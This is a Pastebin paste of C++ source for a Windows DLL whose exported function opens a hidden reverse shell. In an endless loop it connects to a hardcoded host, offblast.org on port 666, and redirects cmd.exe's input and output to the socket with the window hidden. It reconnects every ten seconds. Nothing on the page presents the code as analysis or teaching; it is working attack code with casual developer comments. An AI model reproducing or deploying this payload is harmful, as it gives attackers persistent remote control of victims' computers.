API tools faq
paste
Guest User

Untitled

a guest
Jun 17th, 2018
91
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.31 KB | None | 0 0
raw download clone embed print report
  1. // dllmain.cpp : Defines the entry point for the DLL application.
  2.  
  3. #define WIN32_LEAN_AND_MEAN
  4. #include <windows.h>
  5. #include <ws2tcpip.h>
  6. #pragma comment(lib, "ws2_32")
  7. #include <cstdio>
  8. #include <string.h>
  9.  
  10. #define DEBUG 1
  11.  
  12. extern "C" __declspec(dllexport) int makeshellthread(); // make sure outside application can find the function we want to run!
  13.  
  14. extern int makeshellthread(); // prototypes
  15. void makeshell();
  16.  
  17. BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
  18. // this is boring DLL crap. called when DLL is loaded (?)
  19. {
  20. switch (ul_reason_for_call)
  21. {
  22. case DLL_PROCESS_ATTACH:
  23. case DLL_THREAD_ATTACH:
  24. case DLL_THREAD_DETACH:
  25. case DLL_PROCESS_DETACH:
  26. break;
  27. }
  28. return TRUE;
  29. }
  30.  
  31. extern int makeshellthread() {
  32. WSADATA wsaData;
  33. WSAStartup(MAKEWORD(2,0),&wsaData);
  34.  
  35. DWORD dwThreadId;
  36. HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)makeshell, NULL, 0, &dwThreadId);
  37. return 0;
  38. WSACleanup();
  39. }
  40.  
  41. void makeshell(){
  42.  
  43. // socket, process info
  44.  
  45. while(1){
  46.  
  47. SOCKET hSocket = 0;
  48. char *hostname = "offblast.org";
  49. unsigned short port = 666;
  50.  
  51. // networking structs
  52.  
  53. struct addrinfo *result = NULL;
  54. struct addrinfo *ptr = NULL;
  55. struct addrinfo hints;
  56. struct sockaddr_in *adik_sin;
  57.  
  58. // prep structs
  59.  
  60.  
  61. SecureZeroMemory(&adik_sin, sizeof(adik_sin));
  62. SecureZeroMemory(&hints, sizeof(hints));
  63.  
  64.  
  65. // prep hints struct
  66.  
  67. hints.ai_family = AF_UNSPEC;
  68. hints.ai_socktype = SOCK_STREAM;
  69. hints.ai_protocol = IPPROTO_TCP;
  70.  
  71. // get addr info :D
  72. getaddrinfo(hostname, "666", &hints, &result); // already done that. then what does that function do? what func, the one you typed? inet_ptons() host -> network byte stuff.. :/
  73.  
  74. // make a pointer
  75. // use this for iterating through the results of getaddrinfo
  76. // for(ptr=result; ptr != NULL ;ptr=ptr->ai_next) {
  77. ptr=result;
  78.  
  79. // make a socket handle
  80.  
  81. hSocket = WSASocketW(result->ai_family,SOCK_STREAM,NULL,NULL,NULL,NULL);
  82.  
  83. // set up the data for connect()
  84.  
  85. adik_sin = (struct sockaddr_in *)ptr->ai_addr;
  86.  
  87.  
  88.  
  89. // convert the IP to a string and print it:
  90.  
  91. ///////////////////////////////////////////////////////////////////////////////////////////////////
  92. // USE THE FOLLOWING ONLY TO PRINT DATA
  93. ///////////////////////////////////////////////////////////////////////////////////////////////////
  94. /*
  95. void *addr;
  96. char *ipver;
  97. addr = &(adik_sin->sin_addr);
  98. if(adik_sin->sin_family = 2) {
  99. ipver = "IPv4";
  100. }
  101. else
  102. {
  103. ipver ="AF_Unknown";
  104. }
  105.  
  106. char ipstr[INET6_ADDRSTRLEN] = { NULL };
  107.  
  108. getnameinfo((struct sockaddr *) &addr, sizeof (struct sockaddr), ipstr, INET6_ADDRSTRLEN, NULL, 0, NI_NUMERICSERV);
  109. */
  110. ///////////////////////////////////////////////////////////////////////////////////////////////////
  111.  
  112. // connect to our IP
  113.  
  114. connect(hSocket,(struct sockaddr*) adik_sin,sizeof(struct sockaddr));
  115.  
  116. // set up the I/O handles for our process, redirect everything to the socket
  117.  
  118. STARTUPINFOA si;
  119. SecureZeroMemory(&si, sizeof(si));
  120. si.cb = sizeof(si);
  121. si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  122. si.wShowWindow = SW_HIDE;
  123. si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
  124.  
  125. /*
  126. SECURITY_ATTRIBUTES *sa;
  127. SECURITY_DESCRIPTOR *sd;
  128.  
  129. // set the acl
  130.  
  131. ACL *acl;
  132. EXPLICIT_ACCESS ea;
  133. SecureZeroMemory(&acl, sizeof(ACL));
  134. acl->AclRevision = ACL_REVISION;
  135.  
  136. // set up security -.-
  137.  
  138. InitializeSecurityDescriptor(&sd,SECURITY_DESCRIPTOR_REVISION);
  139.  
  140.  
  141.  
  142. sa->nLength = sizeof(SECURITY_ATTRIBUTES);
  143. sa->lpSecurityDescriptor = sd;
  144. sa->bInheritHandle = TRUE;
  145.  
  146. */
  147.  
  148. // call the process
  149.  
  150. PROCESS_INFORMATION pi;
  151.  
  152. //wchar_t wcmd[] = L"%systemroot%//system32//cmd.exe";
  153.  
  154. BOOL procWorked = CreateProcessA(NULL,"cmd.exe",NULL,NULL,true,0,NULL,NULL,&si,&pi);
  155. #ifdef DEBUG
  156. if(procWorked == 0) {
  157. char *error = new char[100];
  158. sprintf(error, "CreateProcess FAILED: %i", GetLastError());
  159. MessageBoxA(0, error, "CreateProcess()", MB_OK);
  160. }
  161. #endif
  162.  
  163. WaitForSingleObject(pi.hProcess, INFINITE);
  164. CloseHandle( pi.hProcess );
  165. CloseHandle( pi.hThread );
  166.  
  167.  
  168. // free the struct returned by getaddrinfo()
  169.  
  170. freeaddrinfo(result);
  171. WSASendDisconnect(hSocket, NULL);
  172. closesocket(hSocket);
  173.  
  174. Sleep(10000);
  175.  
  176. }
  177. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!